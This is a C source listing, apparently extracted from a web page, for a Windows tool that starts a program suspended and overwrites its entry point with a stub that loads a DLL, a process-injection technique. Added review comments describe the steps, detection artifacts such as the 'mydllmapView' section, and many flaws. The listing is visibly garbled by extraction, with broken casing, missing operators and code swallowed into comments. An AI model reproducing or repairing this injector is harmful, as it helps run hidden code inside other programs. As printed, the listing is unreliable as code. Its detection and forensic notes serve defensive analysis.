#include
#include
#pragma comment (Lib, "ImageHLP.LIB")
// INJECT_CODE: byte-packed (1-byte alignment) image of the instruction stub
// that jet() fills in and writes over the target executable's entry point
// with WriteProcessMemory. The opcode fields are each followed by their
// operand: jet() stores 0x60 (PUSHAD), 0x68 (PUSH imm32), 0xB8 (MOV EAX,
// imm32), 0xD0FF (bytes FF D0, CALL EAX), 0xB8 again and 0xE0FF (bytes FF E0,
// JMP EAX). szDLL carries the DLL path inline, after the instructions.
// Addresses are held in DWORD fields, so the layout is 32-bit x86 only.
// NOTE(review): the listing was collapsed by extraction; as printed, the
// typedef and the closing #pragma share the opening #pragma's line.
#pragma pack (push, 1) typedef struct {BYTE int_PUSHAD; BYTE int_PUSH; DWORD push_Value; BYTE int_MOVEAX; DWORD eax_Value; WORD call_eax; BYTE jmp_MOVEAX; DWORD jmp_Value; WORD jmp_eax; char szDLL [MAX_PATH];} INJECT_LOADLIBRARY_CODE, * LPINJECT_CODE, INJECT_CODE; #pragma pack (pop, 1)
// spy_mem_share: record that jet() places in the named file mapping
// "mydllmapView". It holds the target's entry-point address and a copy of
// the sizeof (INJECT_CODE) bytes that jet() reads from that address with
// ReadProcessMemory before overwriting them.
// NOTE(review): presumably the loaded DLL opens the mapping to put the saved
// bytes back; that side is not part of this listing. For forensics, the
// section object name and its contents (original entry bytes) are host
// artifacts of this technique.
// NOTE(review): keyword and type casing is damaged by extraction
// ("TypeDef", "lpbyte", "Byte"), and everything after the first "//" on this
// line, including the second field and the closing brace, reads as a comment.
TypeDef struct {lpbyte lpentrypoint; // The entry address of the target process Byte OldCode [SizeOf (INJECT_CODE)]; // Code of the target process Save} spy_mem_share, * lpspy_mem_share;
// jmp_code and the file-scope instance _lpcode: three address/code fields
// (two DWORD addresses and four DWORDs of saved code).
// NOTE(review): nothing else in the visible listing reads or writes _lpcode;
// its role cannot be determined from this page.
Typedef struct {dword oddr; dword oldaddr; dword oldcode [4];} jmp_code, * lpjmp_code; static jmp_code _lpcode;
// GetExeEntryPoint: maps the executable named by `filename` with ImageLoad
// (ImageHlp), reads AddressOfEntryPoint and ImageBase from the optional
// header, unloads the image and returns the result as an LPBYTE. Returns NULL
// when ImageLoad fails.
// NOTE(review): the address is derived from the on-disk header's preferred
// ImageBase; nothing here accounts for the image being relocated at load
// time, so the value is only meaningful for an image loaded at that base.
// NOTE(review): extraction damage - the operator joining the two header
// fields is missing, identifier casing is inconsistent (pNTHeader /
// Pntheader, pImage / PIMAGE), the function's closing brace is absent, and
// the whole first line reads as a comment because it starts with "//".
// Find the entry point process LPBYTE GetExeEntryPoint (char * filename) {PIMAGE_NT_HEADERS pNTHeader; DWORD pEntryPoint; PLOADED_IMAGE pImage; pImage = ImageLoad (filename, NULL); if (pImage == NULL) return NULL; pNTHeader = pImage-> FileHeader; pEntryPoint = Pntheader-> OptionalHeader.addressofentryPoint Pntheader-> OptionalHeader.ImageBase; Imageunload (PIMAGE);
Return (lpbyte) pentrypoint;
// jet: starts szRunFile suspended, overwrites the bytes at its entry point
// with an INJECT_CODE stub that references szMyDll and LoadLibrary, then
// resumes the main thread. This is entry-point patching of a child process,
// a form of process injection (MITRE ATT&CK T1055).
//
// Parameters:
//   szRunFile - command line passed to CreateProcessA and file name passed
//               to GetExeEntryPoint.
//   szMyDll   - DLL path copied into the stub's szDLL field.
//
// Observable sequence for detection: CreateProcess with CREATE_SUSPENDED,
// cross-process ReadProcessMemory / VirtualProtectEx / WriteProcessMemory
// aimed at the image entry point, creation of the named section
// "mydllmapView", then ResumeThread.
//
// NOTE(review): no API return value is checked anywhere in this function,
// and the process, thread and mapping handles are never closed here.
void jet (LPSTR szRunFile, LPSTR szMyDll) {STARTUPINFO stInfo = {sizeof (stInfo)}; PROCESS_INFORMATION m_proInfo = {0}; LPBYTE pEntryPoint; HANDLE hMap; SIZE_T cBytesMoved; LPSPY_MEM_SHARE lpMap; INJECT_CODE newCode;
// Create the target with its main thread suspended so that no code of the
// target has run when the entry point is modified.
CreateProcessa (0, Szrunfile, 0, 0, False, Create_suspended, 0, NULL, & STINFO, & M_PROINFO);
// Resolve the entry address from the file on disk, then create a
// pagefile-backed named mapping sized for one spy_mem_share record.
// NOTE(review): the handle constant is printed as 0xfffffff (seven digits);
// INVALID_HANDLE_VALUE was presumably intended - confirm against the original.
PENTRYPOINT = getExeentryPoint (Szrunfile); hmap = createfilemapping ((handle) 0xfffffff, null, page_readwrite, 0, sizeof (spy_mem_share), "mydllmapView");
// Save the original entry bytes and the entry address into the mapping, then
// fill in the stub. eax_Value is the address of LoadLibrary in THIS process;
// the code assumes that address is also valid in the target. push_Value is
// meant to point at the szDLL field as it will sit in the target.
// NOTE(review): lstrcpy copies szMyDll into the MAX_PATH-byte szDLL field
// with no length check. jmp_Value is not assigned in the visible code. The
// operator in the push_Value expression and a closing parenthesis are
// missing in the listing (extraction damage).
lpMap = (LPSPY_MEM_SHARE) MapViewOfFile (hMap, FILE_MAP_ALL_ACCESS, 0, 0, 0); ReadProcessMemory (m_proInfo.hProcess, pEntryPoint, & lpMap-> oldcode, sizeof (INJECT_CODE), & cBytesMoved); lpMap-> lpEntryPoint = pEntryPoint; lstrcpy (newCode. szDLL, szMyDll); newCode.int_PUSHAD = 0x60; newCode.int_PUSH = 0x68; newCode.int_MOVEAX = 0xB8; newCode.call_eax = 0xD0FF; newCode.jmp_MOVEAX = 0xB8; newCode.jmp_eax = 0xE0FF; newCode.eax_Value = (DWORD) & LoadLibrary; Newcode.push_value = (dword) (PentryPoint Offsetof (INJECT_CODE, SZDLL);
// Change the page protection at the entry point to PAGE_READWRITE, write the
// stub, then restore the previous protection.
// NOTE(review): the protection change is requested for sizeof (DWORD) bytes
// while the write covers sizeof (newCode); the byte count written is not
// collected (NULL). As printed, the restoring VirtualProtectEx call sits
// after "//" and therefore reads as a comment.
DWORD dwNewFlg, dwOldFlg; dwNewFlg = PAGE_READWRITE; VirtualProtectEx (m_proInfo.hProcess, (LPVOID) pEntryPoint, sizeof (DWORD), dwNewFlg, & dwOldFlg); WriteProcessMemory (m_proInfo.hProcess, pEntryPoint, & newCode, sizeof (newCode), NULL); // & dwrited; VirtualProtectex (M_Proinfo.hprocess, (LPVOID) Pentrypoint, Sizeof (DWORD), DWOLDFLG, & DWNEWFLG);
// The view is unmapped but, per the author's note, the mapping handle is
// deliberately left open. NOTE(review): presumably so the named section
// outlives this function for the other side to open - confirm.
// Release Filemaping Note, not CloseHandle (HMAP) unmapViewOffile (LPMAP);
// Let the suspended main thread run; execution starts at the patched entry.
// Continue the running resumethread (m_Proinfo.hthread);}
// Program entry point: calls jet() with the hard-coded target "IKeeper.mpc"
// and DLL "INET.DLL", sleeps 6000 ms and exits with 0.
// NOTE(review): the sleep presumably keeps this process, and with it the
// open "mydllmapView" mapping handle, alive while the target starts - confirm.
// NOTE(review): as printed, the signature line starts with "//" and so reads
// as a comment; identifier casing (apientry, JET, SLEEP, Return) is
// extraction damage.
// int apientry _twinmain (Hinstance Hinstance, Hinstance Hprevinstance, LPTSTR LPCMDLINE, INT NCMDSHOW) {JET ("IKeeper.mpc", "INET.DLL");
SLEEP (6000); Return 0;}